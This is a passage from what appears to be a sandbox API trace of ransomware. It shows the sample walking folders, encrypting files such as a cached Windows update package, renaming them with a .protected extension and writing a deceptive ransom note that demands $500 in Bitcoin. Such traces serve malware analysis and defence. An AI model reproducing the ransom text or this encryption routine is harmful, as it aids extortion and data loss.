(lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.220] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0073.220] CloseHandle (hObject=0xb4) returned 1 [0073.220] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0073.220] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0073.221] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\RESTORE_FILES.txt") returned 91 [0073.221] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0073.221] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.221] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0073.222] lstrlenA (lpString="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") returned 684 [0073.222] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0073.222] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.222] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0073.222] CloseHandle (hObject=0xa4) returned 1 [0073.222] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0073.222] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="Windows") returned -1 [0073.222] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="Program Files") returned -1 [0073.222] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="Program Files (x86)") returned -1 [0073.222] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="$Recycle.bin") returned 1 [0073.222] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="System Volume Information") returned -1 [0073.222] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned 73 [0073.222] lstrcmpW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2=".") returned 1 [0073.222] lstrcmpW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="..") returned 1 [0073.222] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*") returned 75 [0073.222] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0073.223] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.223] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.223] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.223] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.223] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.223] wnsprintfW (in: pszDest=0x47e9d8, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\.") returned 75 [0073.223] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.223] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.223] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.223] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.223] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.223] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.224] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.224] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\..") returned 76 [0073.224] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.224] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.224] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.224] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0073.224] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0073.224] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0073.224] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0073.224] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0073.224] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages") returned 82 [0073.224] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0073.224] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0073.224] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*") returned 84 [0073.224] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0073.224] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.224] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.224] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.224] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.224] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.224] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\.") returned 84 [0073.224] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.224] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0073.225] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.225] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.225] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.225] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.225] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.225] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\..") returned 85 [0073.225] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.225] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.225] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0073.225] lstrcmpiW (lpString1="Patch", 
lpString2="Windows") returned -1 [0073.225] lstrcmpiW (lpString1="Patch", lpString2="Program Files") returned -1 [0073.225] lstrcmpiW (lpString1="Patch", lpString2="Program Files (x86)") returned -1 [0073.225] lstrcmpiW (lpString1="Patch", lpString2="$Recycle.bin") returned 1 [0073.225] lstrcmpiW (lpString1="Patch", lpString2="System Volume Information") returned -1 [0073.225] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch") returned 88 [0073.225] lstrcmpW (lpString1="Patch", lpString2=".") returned 1 [0073.225] lstrcmpW (lpString1="Patch", lpString2="..") returned 1 [0073.225] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*") returned 90 [0073.225] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0073.226] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.226] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.226] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.226] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.226] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.226] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\.") returned 90 [0073.226] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.226] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0073.226] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.226] lstrcmpiW 
(lpString1="..", lpString2="Program Files") returned -1 [0073.226] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.226] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.226] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.226] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\..") returned 91 [0073.226] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.226] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.226] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0073.226] lstrcmpiW (lpString1="x64", lpString2="Windows") returned 1 [0073.226] lstrcmpiW (lpString1="x64", lpString2="Program Files") returned 1 [0073.226] lstrcmpiW (lpString1="x64", lpString2="Program Files (x86)") returned 1 [0073.226] lstrcmpiW (lpString1="x64", lpString2="$Recycle.bin") returned 1 [0073.226] lstrcmpiW (lpString1="x64", lpString2="System Volume Information") returned 1 [0073.226] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64") returned 92 [0073.226] lstrcmpW (lpString1="x64", lpString2=".") returned 1 [0073.226] lstrcmpW (lpString1="x64", lpString2="..") returned 1 [0073.230] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*") returned 94 [0073.230] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x447cc0 [0073.230] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 
[0073.230] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.230] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.230] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.230] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.231] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\.") returned 94 [0073.231] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.231] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0073.231] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.231] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.231] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.231] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.231] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.231] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\..") returned 95 [0073.231] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.231] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.231] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0073.231] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="Windows") returned 1 [0073.231] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="Program Files") returned 1 [0073.231] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="Program Files (x86)") returned 1 [0073.231] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="$Recycle.bin") returned 1 [0073.231] lstrcmpiW 
(lpString1="Windows6.1-KB2999226-x64.msu", lpString2="System Volume Information") returned 1 [0073.231] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned 121 [0073.231] StrStrIW (lpFirst="Windows6.1-KB2999226-x64.msu", lpSrch=".protected") returned 0x0 [0073.231] lstrcmpW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="RESTORE_FILES.txt") returned 1 [0073.231] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0073.231] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0073.231] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0073.231] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned 121 [0073.231] StrStrW (lpFirst="Windows6.1-KB2999226-x64.msu", lpSrch=".txt") returned 0x0 [0073.231] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned 121 [0073.231] StrStrW (lpFirst="Windows6.1-KB2999226-x64.msu", lpSrch=".rar") returned 0x0 [0073.231] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package 
Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned 121 [0073.232] StrStrW (lpFirst="Windows6.1-KB2999226-x64.msu", lpSrch=".zip") returned 0x0 [0073.232] ReadFile (in: hFile=0x14c, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0073.261] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.261] WriteFile (in: hFile=0x14c, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0073.262] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.262] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0073.267] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0073.267] CloseHandle (hObject=0x14c) returned 1 [0073.267] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.protected") returned 131 [0073.267] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package 
cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.protected" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.protected")) returned 1 [0073.268] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0073.268] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0073.268] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\RESTORE_FILES.txt") returned 110 [0073.268] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0073.268] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.268] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0073.269] lstrlenA (lpString="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") returned 684 [0073.269] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0073.269] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.269] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0073.269] CloseHandle (hObject=0xd8) returned 1 [0073.270] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0073.270] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0073.270] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\RESTORE_FILES.txt") returned 106 [0073.270] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0073.270] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.270] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0073.271] lstrlenA (lpString="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") returned 684 [0073.271] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0073.271] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.271] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
